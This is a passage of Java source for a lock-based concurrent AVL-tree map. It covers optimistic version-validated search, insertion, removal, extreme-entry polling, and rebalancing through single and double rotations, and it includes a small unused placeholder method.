// there may be a matching node on the left branch
final Node<K,V> z = boundedMin(node.left, minCmp, minIncl);
if (z != null) {
return z;
}
}
if (c < 0 || (c == 0 && minIncl)) {
// this node is a candidate, is it actually present?
if (node.vOpt != null) {
return node;
}
}
// the matching node is on the right branch if it is present
node = node.right;
}
return null;
}
private Node<K,V> boundedMax(Node<K,V> node,
final Comparable<? super K> maxCmp,
final boolean maxIncl) {
while (node != null) {
final int c = maxCmp.compareTo(node.key);
if (c > 0) {
// there may be a matching node on the right branch
final Node<K,V> z = boundedMax(node.right, maxCmp, maxIncl);
if (z != null) {
return z;
}
}
if (c > 0 || (c == 0 && maxIncl)) {
// this node is a candidate, is it actually present?
if (node.vOpt != null) {
return node;
}
}
// the matching node is on the left branch if it is present
node = node.left;
}
return null;
}
//////////////// update
    // Update-mode selectors passed through update()/updateUnderRoot():
    private static final int UpdateAlways = 0;    // put / remove(key)
    private static final int UpdateIfAbsent = 1;  // putIfAbsent
    private static final int UpdateIfPresent = 2; // replace(key, value)
    private static final int UpdateIfEq = 3;      // replace(key, old, new) / remove(key, value)
private static boolean shouldUpdate(final int func, final Object prev, final Object expected) {
switch (func) {
case UpdateAlways: return true;
case UpdateIfAbsent: return prev == null;
case UpdateIfPresent: return prev != null;
default: { // UpdateIfEq
assert(expected != null);
if (prev == null) {
return false;
}
if (AllowNullValues && (prev == SpecialNull || expected == SpecialNull)) {
return prev == SpecialNull && expected == SpecialNull;
}
return prev.equals(expected);
}
}
}
private static Object noUpdateResult(final int func, final Object prev) {
return func == UpdateIfEq ? Boolean.FALSE : prev;
}
private static Object updateResult(final int func, final Object prev) {
return func == UpdateIfEq ? Boolean.TRUE : prev;
}
private static int sizeDelta(final int func, final Object result, final Object newValue) {
switch (func) {
case UpdateAlways: {
return (result != null ? -1 : 0) + (newValue != null ? 1 : 0);
}
case UpdateIfAbsent: {
assert(newValue != null);
return result != null ? 0 : 1;
}
case UpdateIfPresent: {
return result == null ? 0 : (newValue != null ? 0 : -1);
}
default: { // UpdateIfEq
return !((Boolean) result) ? 0 : (newValue != null ? 0 : -1);
}
}
}
    @Override
    public V put(final K key, final V value) {
        return decodeNull(update(key, UpdateAlways, null, encodeNull(value)));
    }

    @Override
    public V putIfAbsent(final K key, final V value) {
        return decodeNull(update(key, UpdateIfAbsent, null, encodeNull(value)));
    }

    @Override
    public V replace(final K key, final V value) {
        return decodeNull(update(key, UpdateIfPresent, null, encodeNull(value)));
    }

    @Override
    public boolean replace(final K key, final V oldValue, final V newValue) {
        return (Boolean) update(key, UpdateIfEq, encodeNull(oldValue), encodeNull(newValue));
    }

    @Override
    public V remove(final Object key) {
        // a null newValue requests removal
        return decodeNull(update(key, UpdateAlways, null, null));
    }

    @Override
    public boolean remove(final Object key, final Object value) {
        if (key == null) {
            throw new NullPointerException();
        }
        if (!AllowNullValues && value == null) {
            // a null value can never be present, so nothing can match
            return false;
        }
        return (Boolean) update(key, UpdateIfEq, encodeNull(value), null);
    }
    // manages the epoch
    /** Common entry point of all mutations: acquires an epoch ticket so that
     * snapshots can quiesce writers, performs the update, and reports the
     * resulting size delta when releasing the ticket.
     */
    private Object update(final Object key,
                          final int func,
                          final Object expected,
                          final Object newValue) {
        final Comparable<? super K> k = comparable(key);
        int sd = 0;
        final Epoch.Ticket ticket = holderRef.beginMutation();
        try {
            final Object result = updateUnderRoot(key, k, func, expected, newValue, holderRef.mutable());
            sd = sizeDelta(func, result, newValue);
            return result;
        } finally {
            ticket.leave(sd);
        }
    }
    // manages updates to the root holder
    /** Root-level step of an update: handles the empty-tree case, otherwise
     * validates the root's OVL and delegates to the recursive attemptUpdate,
     * retrying on optimistic failure.
     */
    @SuppressWarnings("unchecked")
    private Object updateUnderRoot(final Object key,
                                   final Comparable<? super K> k,
                                   final int func,
                                   final Object expected,
                                   final Object newValue,
                                   final RootHolder<K,V> holder) {

        while (true) {
            final Node<K,V> right = holder.unsharedRight();
            if (right == null) {
                // key is not present
                if (!shouldUpdate(func, null, expected)) {
                    return noUpdateResult(func, null);
                }
                if (newValue == null || attemptInsertIntoEmpty((K)key, newValue, holder)) {
                    // nothing needs to be done, or we were successful, prev value is Absent
                    return updateResult(func, null);
                }
                // else RETRY
            } else {
                final long ovl = right.shrinkOVL;
                if (isShrinkingOrUnlinked(ovl)) {
                    right.waitUntilShrinkCompleted(ovl);
                    // RETRY
                } else if (right == holder.right) {
                    // this is the protected .right
                    final Object vo = attemptUpdate(key, k, func, expected, newValue, holder, right, ovl);
                    if (vo != SpecialRetry) {
                        return vo;
                    }
                    // else RETRY
                }
            }
        }
    }
    /** Installs the first node of the tree under the holder's lock; returns
     * false (caller retries) if another thread won the race.
     */
    private boolean attemptInsertIntoEmpty(final K key,
                                           final Object vOpt,
                                           final RootHolder<K,V> holder) {
        synchronized (holder) {
            if (holder.right == null) {
                holder.right = new Node<K,V>(key, 1, vOpt, holder, 0L, null, null);
                holder.height = 2;
                return true;
            } else {
                return false;
            }
        }
    }
    /** If successful returns the non-null previous value, SpecialNull for a
     * null previous value, or null if not previously in the map.
     * The caller should retry if this method returns SpecialRetry.
     */
    @SuppressWarnings("unchecked")
    private Object attemptUpdate(final Object key,
                                 final Comparable<? super K> k,
                                 final int func,
                                 final Object expected,
                                 final Object newValue,
                                 final Node<K,V> parent,
                                 final Node<K,V> node,
                                 final long nodeOVL) {
        // As the search progresses there is an implicit min and max assumed for the
        // branch of the tree rooted at node. A left rotation of a node x results in
        // the range of keys in the right branch of x being reduced, so if we are at a
        // node and we wish to traverse to one of the branches we must make sure that
        // the node has not undergone a rotation since arriving from the parent.
        //
        // A rotation of node can't screw us up once we have traversed to node's
        // child, so we don't need to build a huge transaction, just a chain of
        // smaller read-only transactions.

        assert (nodeOVL != UnlinkedOVL);

        final int cmp = k.compareTo(node.key);
        if (cmp == 0) {
            // this node holds the key; update it in place (or unlink it)
            return attemptNodeUpdate(func, expected, newValue, parent, node);
        }

        final char dirToC = cmp < 0 ? Left : Right;

        while (true) {
            final Node<K,V> child = node.unsharedChild(dirToC);

            if (node.shrinkOVL != nodeOVL) {
                return SpecialRetry;
            }

            if (child == null) {
                // key is not present
                if (newValue == null) {
                    // Removal is requested.  Read of node.child occurred
                    // while parent.child was valid, so we were not affected
                    // by any shrinks.
                    return null;
                } else {
                    // Update will be an insert.
                    final boolean success;
                    final Node<K,V> damaged;
                    synchronized (node) {
                        // Validate that we haven't been affected by past
                        // rotations.  We've got the lock on node, so no future
                        // rotations can mess with us.
                        if (node.shrinkOVL != nodeOVL) {
                            return SpecialRetry;
                        }

                        if (node.child(dirToC) != null) {
                            // Lost a race with a concurrent insert.  No need
                            // to back up to the parent, but we must RETRY in
                            // the outer loop of this method.
                            success = false;
                            damaged = null;
                        } else {
                            // We're valid.  Does the user still want to
                            // perform the operation?
                            if (!shouldUpdate(func, null, expected)) {
                                return noUpdateResult(func, null);
                            }

                            // Create a new leaf
                            node.setChild(dirToC, new Node<K,V>((K)key, 1, newValue, node, 0L, null, null));
                            success = true;

                            // attempt to fix node.height while we've still got
                            // the lock
                            damaged = fixHeight_nl(node);
                        }
                    }
                    if (success) {
                        fixHeightAndRebalance(damaged);
                        return updateResult(func, null);
                    }
                    // else RETRY
                }
            } else {
                // non-null child
                final long childOVL = child.shrinkOVL;
                if (isShrinkingOrUnlinked(childOVL)) {
                    child.waitUntilShrinkCompleted(childOVL);
                    // RETRY
                } else if (child != node.child(dirToC)) {
                    // this second read is important, because it is protected
                    // by childOVL
                    // RETRY
                } else {
                    // validate the read that our caller took to get to node
                    if (node.shrinkOVL != nodeOVL) {
                        return SpecialRetry;
                    }

                    // At this point we know that the traversal our parent took
                    // to get to node is still valid.  The recursive
                    // implementation will validate the traversal from node to
                    // child, so just prior to the nodeOVL validation both
                    // traversals were definitely okay.  This means that we are
                    // no longer vulnerable to node shrinks, and we don't need
                    // to validate nodeOVL any more.
                    final Object vo = attemptUpdate(key, k, func, expected, newValue, node, child, childOVL);
                    if (vo != SpecialRetry) {
                        return vo;
                    }
                    // else RETRY
                }
            }
        }
    }
    /** parent will only be used for unlink, update can proceed even if parent
     * is stale.
     * Performs the update on the node that holds the key: either an in-place
     * vOpt change, or (for a removal where the node has at most one child) a
     * physical unlink under parent+node locks.  Returns SpecialRetry if the
     * locked state no longer matches what was validated optimistically.
     */
    private Object attemptNodeUpdate(final int func,
                                     final Object expected,
                                     final Object newValue,
                                     final Node<K,V> parent,
                                     final Node<K,V> node) {
        if (newValue == null) {
            // removal
            if (node.vOpt == null) {
                // This node is already removed, nothing to do.
                return null;
            }
        }

        if (newValue == null && (node.left == null || node.right == null)) {
            // potential unlink, get ready by locking the parent
            final Object prev;
            final Node<K,V> damaged;
            synchronized (parent) {
                if (isUnlinked(parent.shrinkOVL) || node.parent != parent) {
                    return SpecialRetry;
                }

                synchronized (node) {
                    prev = node.vOpt;
                    if (!shouldUpdate(func, prev, expected)) {
                        return noUpdateResult(func, prev);
                    }
                    if (prev == null) {
                        return updateResult(func, prev);
                    }
                    if (!attemptUnlink_nl(parent, node)) {
                        return SpecialRetry;
                    }
                }
                // try to fix the parent while we've still got the lock
                damaged = fixHeight_nl(parent);
            }
            fixHeightAndRebalance(damaged);
            return updateResult(func, prev);
        } else {
            // potential update (including remove-without-unlink)
            synchronized (node) {
                // regular version changes don't bother us
                if (isUnlinked(node.shrinkOVL)) {
                    return SpecialRetry;
                }

                final Object prev = node.vOpt;
                if (!shouldUpdate(func, prev, expected)) {
                    return noUpdateResult(func, prev);
                }

                // retry if we now detect that unlink is possible
                if (newValue == null && (node.left == null || node.right == null)) {
                    return SpecialRetry;
                }

                // update in-place
                node.vOpt = newValue;
                return updateResult(func, prev);
            }
        }
    }
    /** Does not adjust the size or any heights.
     * Splices <tt>node</tt> (which must have at most one child) out of the
     * tree while both parent and node locks are held ("_nl" = locks needed).
     * Returns false if the structure changed since the caller's checks.
     */
    private boolean attemptUnlink_nl(final Node<K,V> parent, final Node<K,V> node) {
        // assert (Thread.holdsLock(parent));
        // assert (Thread.holdsLock(node));
        assert (!isUnlinked(parent.shrinkOVL));

        final Node<K,V> parentL = parent.left;
        final Node<K,V> parentR = parent.right;
        if (parentL != node && parentR != node) {
            // node is no longer a child of parent
            return false;
        }

        assert (!isUnlinked(node.shrinkOVL));
        assert (parent == node.parent);

        final Node<K,V> left = node.unsharedLeft();
        final Node<K,V> right = node.unsharedRight();
        if (left != null && right != null) {
            // splicing is no longer possible
            return false;
        }
        final Node<K,V> splice = left != null ? left : right;

        if (parentL == node) {
            parent.left = splice;
        } else {
            parent.right = splice;
        }
        if (splice != null) {
            splice.parent = parent;
        }

        // mark the node dead so optimistic readers holding it will retry
        node.shrinkOVL = UnlinkedOVL;
        node.vOpt = null;

        return true;
    }
//////////////// NavigableMap stuff
    @Override
    public Map.Entry<K,V> pollFirstEntry() {
        return pollExtremeEntry(Left);
    }

    @Override
    public Map.Entry<K,V> pollLastEntry() {
        return pollExtremeEntry(Right);
    }

    /** Removes and returns the extreme entry in direction <tt>dir</tt> under
     * an epoch mutation ticket, reporting -1 to the size count on success.
     */
    private Map.Entry<K,V> pollExtremeEntry(final char dir) {
        final Epoch.Ticket ticket = holderRef.beginMutation();
        int sizeDelta = 0;
        try {
            final Map.Entry<K,V> prev = pollExtremeEntryUnderRoot(dir, holderRef.mutable());
            if (prev != null) {
                sizeDelta = -1;
            }
            return prev;
        } finally {
            ticket.leave(sizeDelta);
        }
    }
private Map.Entry<K,V> pollExtremeEntryUnderRoot(final char dir, final RootHolder<K,V> holder) {
while (true) {
final Node<K,V> right = holder.unsharedRight();
if (right == null) {
// tree is empty, nothing to remove
return null;
} else {
final long ovl = right.shrinkOVL;
if (isShrinkingOrUnlinked(ovl)) {
right.waitUntilShrinkCompleted(ovl);
// RETRY
} else if (right == holder.right) {
// this is the protected .right
final Map.Entry<K,V> result = attemptRemoveExtreme(dir, holder, right, ovl);
if (result != SpecialRetry) {
return result;
}
// else RETRY
}
}
}
}
    /** Walks toward <tt>dir</tt> and unlinks the extreme node, returning its
     * entry.  Every null return is an optimistic failure (OVL changed, lock
     * race, or structure change) and means the caller must retry from the
     * top; this method itself retries when its recursive call returns null.
     */
    private Map.Entry<K,V> attemptRemoveExtreme(final char dir,
                                                final Node<K,V> parent,
                                                final Node<K,V> node,
                                                final long nodeOVL) {
        assert (nodeOVL != UnlinkedOVL);

        while (true) {
            final Node<K,V> child = node.unsharedChild(dir);

            if (nodeOVL != node.shrinkOVL) {
                return null;
            }

            if (child == null) {
                // potential unlink, get ready by locking the parent
                final Object vo;
                final Node<K,V> damaged;
                synchronized (parent) {
                    if (isUnlinked(parent.shrinkOVL) || node.parent != parent) {
                        return null;
                    }

                    synchronized (node) {
                        vo = node.vOpt;
                        if (node.child(dir) != null || !attemptUnlink_nl(parent, node)) {
                            return null;
                        }
                        // success!
                    }
                    // try to fix parent.height while we've still got the lock
                    damaged = fixHeight_nl(parent);
                }
                fixHeightAndRebalance(damaged);
                return new SimpleImmutableEntry<K,V>(node.key, decodeNull(vo));
            } else {
                // keep going down
                final long childOVL = child.shrinkOVL;
                if (isShrinkingOrUnlinked(childOVL)) {
                    child.waitUntilShrinkCompleted(childOVL);
                    // RETRY
                } else if (child != node.child(dir)) {
                    // this second read is important, because it is protected
                    // by childOVL
                    // RETRY
                } else {
                    // validate the read that our caller took to get to node
                    if (node.shrinkOVL != nodeOVL) {
                        return null;
                    }

                    final Map.Entry<K,V> result = attemptRemoveExtreme(dir, node, child, childOVL);
                    if (result != null) {
                        return result;
                    }
                    // else RETRY
                }
            }
        }
    }
//////////////// tree balance and height info repair
    // nodeCondition() return codes: negative sentinels for structural work,
    // any non-negative value is the corrected height to install.
    private static final int UnlinkRequired = -1;
    private static final int RebalanceRequired = -2;
    private static final int NothingRequired = -3;

    /** Classifies what repair, if any, a node needs: unlink (routing node
     * with a missing child), rebalance (AVL balance factor out of range), a
     * height fix (returns the new height), or nothing.
     */
    private int nodeCondition(final Node<K,V> node) {
        // Begin atomic.

        final Node<K,V> nL = node.left;
        final Node<K,V> nR = node.right;

        if ((nL == null || nR == null) && node.vOpt == null) {
            return UnlinkRequired;
        }

        final int hN = node.height;
        final int hL0 = height(nL);
        final int hR0 = height(nR);

        // End atomic.  Since any thread that changes a node promises to fix
        // it, either our read was consistent (and a NothingRequired conclusion
        // is correct) or someone else has taken responsibility for either node
        // or one of its children.

        final int hNRepl = 1 + Math.max(hL0, hR0);
        final int bal = hL0 - hR0;

        if (bal < -1 || bal > 1) {
            return RebalanceRequired;
        }

        return hN != hNRepl ? hNRepl : NothingRequired;
    }
    /** Walks up from <tt>node</tt> repairing heights and performing
     * rotations/unlinks until no damaged ancestor remains.  Stops at the
     * root holder (parent == null) or at an unlinked node.
     */
    private void fixHeightAndRebalance(Node<K,V> node) {
        while (node != null && node.parent != null) {
            final int condition = nodeCondition(node);
            if (condition == NothingRequired || isUnlinked(node.shrinkOVL)) {
                // nothing to do, or no point in fixing this node
                return;
            }

            if (condition != UnlinkRequired && condition != RebalanceRequired) {
                // plain height fix needs only the node's own lock
                synchronized (node) {
                    node = fixHeight_nl(node);
                }
            } else {
                // structural repair needs the parent lock first, then node
                final Node<K,V> nParent = node.parent;
                synchronized (nParent) {
                    if (!isUnlinked(nParent.shrinkOVL) && node.parent == nParent) {
                        synchronized (node) {
                            node = rebalance_nl(nParent, node);
                        }
                    }
                    // else RETRY
                }
            }
        }
    }
    /** Attempts to fix the height of a (locked) damaged node, returning the
     * lowest damaged node for which this thread is responsible.  Returns null
     * if no more repairs are needed.
     */
    private Node<K,V> fixHeight_nl(final Node<K,V> node) {
        final int c = nodeCondition(node);
        switch (c) {
            case RebalanceRequired:
            case UnlinkRequired:
                // can't repair
                return node;
            case NothingRequired:
                // Any future damage to this node is not our responsibility.
                return null;
            default:
                // c is the corrected height
                node.height = c;
                // we've damaged our parent, but we can't fix it now
                return node.parent;
        }
    }
    /** nParent and n must be locked on entry.  Returns a damaged node, or null
     * if no more rebalancing is necessary.
     * Dispatches to unlink (routing leaf), a right or left rotation, or a
     * plain height repair, depending on n's condition.
     */
    private Node<K,V> rebalance_nl(final Node<K,V> nParent, final Node<K,V> n) {

        final Node<K,V> nL = n.unsharedLeft();
        final Node<K,V> nR = n.unsharedRight();

        if ((nL == null || nR == null) && n.vOpt == null) {
            if (attemptUnlink_nl(nParent, n)) {
                // attempt to fix nParent.height while we've still got the lock
                return fixHeight_nl(nParent);
            } else {
                // retry needed for n
                return n;
            }
        }

        final int hN = n.height;
        final int hL0 = height(nL);
        final int hR0 = height(nR);
        final int hNRepl = 1 + Math.max(hL0, hR0);
        final int bal = hL0 - hR0;

        if (bal > 1) {
            // left-heavy
            return rebalanceToRight_nl(nParent, n, nL, hR0);
        } else if (bal < -1) {
            // right-heavy
            return rebalanceToLeft_nl(nParent, n, nR, hL0);
        } else if (hNRepl != hN) {
            // we've got more than enough locks to do a height change, no need to
            // trigger a retry
            n.height = hNRepl;

            // nParent is already locked, let's try to fix it too
            return fixHeight_nl(nParent);
        } else {
            // nothing to do
            return null;
        }
    }
/** Repairs a left-heavy n with a right rotation (possibly preceded by a
 * left rotation of nL).  nParent and n must be locked on entry; nL is n's
 * unshared left child and hR0 is a height snapshot of n.right.  Returns a
 * node that still needs repair, or null if repairs are complete.
 */
private Node<K,V> rotateRightGuard_placeholder() { throw new AssertionError(); }
private Node<K,V> rebalanceToRight_nl(final Node<K,V> nParent,
                                      final Node<K,V> n,
                                      final Node<K,V> nL,
                                      final int hR0) {
    // L is too large, we will rotate-right.  If L.R is taller
    // than L.L, then we will first rotate-left L.
    synchronized (nL) {
        // re-read nL.height under its lock; the imbalance may already be gone
        final int hL = nL.height;
        if (hL - hR0 <= 1) {
            return n; // retry
        } else {
            final Node<K,V> nLR = nL.unsharedRight();
            final int hLL0 = height(nL.left);
            final int hLR0 = height(nLR);
            if (hLL0 >= hLR0) {
                // rotate right based on our snapshot of hLR
                return rotateRight_nl(nParent, n, nL, hR0, hLL0, nLR, hLR0);
            } else {
                synchronized (nLR) {
                    // If our hLR snapshot is incorrect then we might
                    // actually need to do a single rotate-right on n.
                    final int hLR = nLR.height;
                    if (hLL0 >= hLR) {
                        return rotateRight_nl(nParent, n, nL, hR0, hLL0, nLR, hLR);
                    } else {
                        // If the underlying left balance would not be
                        // sufficient to actually fix n.left, then instead
                        // of rolling it into a double rotation we do it on
                        // it's own.  This may let us avoid rotating n at
                        // all, but more importantly it avoids the creation
                        // of damaged nodes that don't have a direct
                        // ancestry relationship.  The recursive call to
                        // rebalanceToRight_nl in this case occurs after we
                        // release the lock on nLR.
                        //
                        // We also need to avoid damaging n.left if post-
                        // rotation it would be an unnecessary routing node.
                        // Note that although our height snapshots might be
                        // stale, their zero/non-zero state can't be.
                        final int hLRL = height(nLR.left);
                        final int b = hLL0 - hLRL;
                        if (b >= -1 && b <= 1 && !((hLL0 == 0 || hLRL == 0) && nL.vOpt == null)) {
                            // nParent.child.left won't be damaged after a double rotation
                            return rotateRightOverLeft_nl(nParent, n, nL, hR0, hLL0, nLR, hLRL);
                        }
                    }
                }
                // focus on nL, if necessary n will be balanced later
                return rebalanceToLeft_nl(n, nL, nLR, hLL0);
            }
        }
    }
}
/** Mirror image of rebalanceToRight_nl: repairs a right-heavy n with a
 * left rotation (possibly preceded by a right rotation of nR).  nParent
 * and n must be locked on entry; nR is n's unshared right child and hL0
 * is a height snapshot of n.left.  Returns a node that still needs
 * repair, or null if repairs are complete.
 */
private Node<K,V> rebalanceToLeft_nl(final Node<K,V> nParent,
                                     final Node<K,V> n,
                                     final Node<K,V> nR,
                                     final int hL0) {
    synchronized (nR) {
        // re-read nR.height under its lock; the imbalance may already be gone
        final int hR = nR.height;
        if (hL0 - hR >= -1) {
            return n; // retry
        } else {
            final Node<K,V> nRL = nR.unsharedLeft();
            final int hRL0 = height(nRL);
            final int hRR0 = height(nR.right);
            if (hRR0 >= hRL0) {
                // a single left rotation suffices based on our snapshots
                return rotateLeft_nl(nParent, n, hL0, nR, nRL, hRL0, hRR0);
            } else {
                synchronized (nRL) {
                    // our hRL snapshot may be stale; re-read under nRL's lock
                    final int hRL = nRL.height;
                    if (hRR0 >= hRL) {
                        return rotateLeft_nl(nParent, n, hL0, nR, nRL, hRL, hRR0);
                    } else {
                        // only roll the inner rotation into a double rotation
                        // when it cannot leave n.right damaged or turn it into
                        // an unnecessary routing node (see the rationale in
                        // rebalanceToRight_nl, which this mirrors)
                        final int hRLR = height(nRL.right);
                        final int b = hRR0 - hRLR;
                        if (b >= -1 && b <= 1 && !((hRR0 == 0 || hRLR == 0) && nR.vOpt == null)) {
                            return rotateLeftOverRight_nl(nParent, n, hL0, nR, nRL, hRR0, hRLR);
                        }
                    }
                }
                // fix nR first; n will be rebalanced later if still needed
                return rebalanceToRight_nl(n, nR, nRL, hRR0);
            }
        }
    }
}
/** Performs a single right rotation of n around its left child nL.
 * nParent, n, and nL must be locked on entry.  hR, hLL, and hLR are
 * height snapshots of n.right, nL.left, and nLR; nLR is nL's unshared
 * right child (may be null).  Returns a node that still needs repair,
 * or the result of fixing nParent's height.
 */
private Node<K,V> rotateRight_nl(final Node<K,V> nParent,
                                 final Node<K,V> n,
                                 final Node<K,V> nL,
                                 final int hR,
                                 final int hLL,
                                 final Node<K,V> nLR,
                                 final int hLR) {
    final long nodeOVL = n.shrinkOVL;
    final Node<K,V> nPL = nParent.left;
    // bracket the structural change with beginChange/endChange on n's OVL;
    // NOTE(review): presumably optimistic readers observe this to detect a
    // shrinking node -- confirm against the OVL protocol elsewhere in the file
    n.shrinkOVL = beginChange(nodeOVL);
    // relink: n adopts nLR as its left child, then nL adopts n on its right
    n.left = nLR;
    if (nLR != null) {
        nLR.parent = n;
    }
    nL.right = n;
    n.parent = nL;
    // splice nL into nParent in place of n (n may be either child)
    if (nPL == n) {
        nParent.left = nL;
    } else {
        nParent.right = nL;
    }
    nL.parent = nParent;
    // fix up heights links
    final int hNRepl = 1 + Math.max(hLR, hR);
    n.height = hNRepl;
    nL.height = 1 + Math.max(hLL, hNRepl);
    n.shrinkOVL = endChange(nodeOVL);
    // We have damaged nParent, n (now parent.child.right), and nL (now
    // parent.child).  n is the deepest.  Perform as many fixes as we can
    // with the locks we've got.

    // We've already fixed the height for n, but it might still be outside
    // our allowable balance range.  In that case a simple fixHeight_nl
    // won't help.
    final int balN = hLR - hR;
    if (balN < -1 || balN > 1) {
        // we need another rotation at n
        return n;
    }
    // we've fixed balance and height damage for n, now handle
    // extra-routing node damage
    if ((nLR == null || hR == 0) && n.vOpt == null) {
        // we need to remove n and then repair
        return n;
    }
    // we've already fixed the height at nL, do we need a rotation here?
    final int balL = hLL - hNRepl;
    if (balL < -1 || balL > 1) {
        return nL;
    }
    // nL might also have routing node damage (if nL.left was null)
    if (hLL == 0 && nL.vOpt == null) {
        return nL;
    }
    // try to fix the parent height while we've still got the lock
    return fixHeight_nl(nParent);
}
/** Mirror image of rotateRight_nl: a single left rotation of n around its
 * right child nR.  nParent, n, and nR must be locked on entry.  hL, hRL,
 * and hRR are height snapshots of n.left, nRL, and nR.right; nRL is nR's
 * unshared left child (may be null).  Returns a node that still needs
 * repair, or the result of fixing nParent's height.
 */
private Node<K,V> rotateLeft_nl(final Node<K,V> nParent,
                                final Node<K,V> n,
                                final int hL,
                                final Node<K,V> nR,
                                final Node<K,V> nRL,
                                final int hRL,
                                final int hRR) {
    final long nodeOVL = n.shrinkOVL;
    final Node<K,V> nPL = nParent.left;
    // bracket the structural change on n's OVL (see rotateRight_nl)
    n.shrinkOVL = beginChange(nodeOVL);
    // fix up n links, careful to be compatible with concurrent traversal for all but n
    n.right = nRL;
    if (nRL != null) {
        nRL.parent = n;
    }
    nR.left = n;
    n.parent = nR;
    // splice nR into nParent in place of n (n may be either child)
    if (nPL == n) {
        nParent.left = nR;
    } else {
        nParent.right = nR;
    }
    nR.parent = nParent;
    // fix up heights
    final int hNRepl = 1 + Math.max(hL, hRL);
    n.height = hNRepl;
    nR.height = 1 + Math.max(hNRepl, hRR);
    n.shrinkOVL = endChange(nodeOVL);
    // n may still be out of balance and need another rotation
    final int balN = hRL - hL;
    if (balN < -1 || balN > 1) {
        return n;
    }
    // n may have become an unnecessary routing node (no value, <= 1 child)
    if ((nRL == null || hL == 0) && n.vOpt == null) {
        return n;
    }
    // nR's height is fixed, but it may still need a rotation
    final int balR = hRR - hNRepl;
    if (balR < -1 || balR > 1) {
        return nR;
    }
    // nR might also have routing-node damage (if nR.right was null)
    if (hRR == 0 && nR.vOpt == null) {
        return nR;
    }
    // try to fix the parent height while we've still got the lock
    return fixHeight_nl(nParent);
}
/** Double rotation: first rotates nL left around nLR, then rotates n
 * right around nLR, leaving nLR in n's old position.  nParent, n, nL,
 * and nLR must be locked on entry.  hR, hLL, and hLRL are height
 * snapshots of n.right, nL.left, and nLR.left.  Returns a node that
 * still needs repair, or the result of fixing nParent's height.
 */
private Node<K,V> rotateRightOverLeft_nl(final Node<K,V> nParent,
                                         final Node<K,V> n,
                                         final Node<K,V> nL,
                                         final int hR,
                                         final int hLL,
                                         final Node<K,V> nLR,
                                         final int hLRL) {
    final long nodeOVL = n.shrinkOVL;
    final long leftOVL = nL.shrinkOVL;
    final Node<K,V> nPL = nParent.left;
    final Node<K,V> nLRL = nLR.unsharedLeft();
    final Node<K,V> nLRR = nLR.unsharedRight();
    final int hLRR = height(nLRR);
    // both n and nL change shape, so both OVLs are bracketed
    n.shrinkOVL = beginChange(nodeOVL);
    nL.shrinkOVL = beginChange(leftOVL);
    // fix up n links, careful about the order!
    n.left = nLRR;
    if (nLRR != null) {
        nLRR.parent = n;
    }
    nL.right = nLRL;
    if (nLRL != null) {
        nLRL.parent = nL;
    }
    nLR.left = nL;
    nL.parent = nLR;
    nLR.right = n;
    n.parent = nLR;
    // splice nLR into nParent in place of n (n may be either child)
    if (nPL == n) {
        nParent.left = nLR;
    } else {
        nParent.right = nLR;
    }
    nLR.parent = nParent;
    // fix up heights
    final int hNRepl = 1 + Math.max(hLRR, hR);
    n.height = hNRepl;
    final int hLRepl = 1 + Math.max(hLL, hLRL);
    nL.height = hLRepl;
    nLR.height = 1 + Math.max(hLRepl, hNRepl);
    n.shrinkOVL = endChange(nodeOVL);
    nL.shrinkOVL = endChange(leftOVL);
    // caller should have performed only a single rotation if nL was going
    // to end up damaged
    assert(Math.abs(hLL - hLRL) <= 1);
    assert(!((hLL == 0 || nLRL == null) && nL.vOpt == null));
    // We have damaged nParent, nLR (now parent.child), and n (now
    // parent.child.right).  n is the deepest.  Perform as many fixes as we
    // can with the locks we've got.

    // We've already fixed the height for n, but it might still be outside
    // our allowable balance range.  In that case a simple fixHeight_nl
    // won't help.
    final int balN = hLRR - hR;
    if (balN < -1 || balN > 1) {
        // we need another rotation at n
        return n;
    }
    // n might also be damaged by being an unnecessary routing node
    if ((nLRR == null || hR == 0) && n.vOpt == null) {
        // repair involves splicing out n and maybe more rotations
        return n;
    }
    // we've already fixed the height at nLR, do we need a rotation here?
    final int balLR = hLRepl - hNRepl;
    if (balLR < -1 || balLR > 1) {
        return nLR;
    }
    // try to fix the parent height while we've still got the lock
    return fixHeight_nl(nParent);
}
/** Mirror image of rotateRightOverLeft_nl: rotates nR right around nRL,
 * then rotates n left around nRL, leaving nRL in n's old position.
 * nParent, n, nR, and nRL must be locked on entry.  hL, hRR, and hRLR
 * are height snapshots of n.left, nR.right, and nRL.right.  Returns a
 * node that still needs repair, or the result of fixing nParent's height.
 */
private Node<K,V> rotateLeftOverRight_nl(final Node<K,V> nParent,
                                         final Node<K,V> n,
                                         final int hL,
                                         final Node<K,V> nR,
                                         final Node<K,V> nRL,
                                         final int hRR,
                                         final int hRLR) {
    final long nodeOVL = n.shrinkOVL;
    final long rightOVL = nR.shrinkOVL;
    final Node<K,V> nPL = nParent.left;
    final Node<K,V> nRLL = nRL.unsharedLeft();
    final Node<K,V> nRLR = nRL.unsharedRight();
    final int hRLL = height(nRLL);
    // both n and nR change shape, so both OVLs are bracketed
    n.shrinkOVL = beginChange(nodeOVL);
    nR.shrinkOVL = beginChange(rightOVL);
    // fix up n links, careful about the order!
    n.right = nRLL;
    if (nRLL != null) {
        nRLL.parent = n;
    }
    nR.left = nRLR;
    if (nRLR != null) {
        nRLR.parent = nR;
    }
    nRL.right = nR;
    nR.parent = nRL;
    nRL.left = n;
    n.parent = nRL;
    // splice nRL into nParent in place of n (n may be either child)
    if (nPL == n) {
        nParent.left = nRL;
    } else {
        nParent.right = nRL;
    }
    nRL.parent = nParent;
    // fix up heights
    final int hNRepl = 1 + Math.max(hL, hRLL);
    n.height = hNRepl;
    final int hRRepl = 1 + Math.max(hRLR, hRR);
    nR.height = hRRepl;
    nRL.height = 1 + Math.max(hNRepl, hRRepl);
    n.shrinkOVL = endChange(nodeOVL);
    nR.shrinkOVL = endChange(rightOVL);
    // caller should have performed only a single rotation if nR was going
    // to end up damaged
    assert(Math.abs(hRR - hRLR) <= 1);
    // n may still be out of balance and need another rotation
    final int balN = hRLL - hL;
    if (balN < -1 || balN > 1) {
        return n;
    }
    // n may have become an unnecessary routing node
    if ((nRLL == null || hL == 0) && n.vOpt == null) {
        return n;
    }
    // nRL's height is fixed, but it may still need a rotation
    final int balRL = hRRepl - hNRepl;
    if (balRL < -1 || balRL > 1) {
        return nRL;
    }
    // try to fix the parent height while we've still got the lock
    return fixHeight_nl(nParent);
}
//////////////// Map views
/** Returns a live NavigableSet view of the keys; equivalent to
 * {@link #navigableKeySet()}.
 */
@Override
public NavigableSet<K> keySet() {
    return navigableKeySet();
}
/** Returns a live Set view of the mappings in this map. */
@Override
public Set<Map.Entry<K,V>> entrySet() {
    return new EntrySet();
}
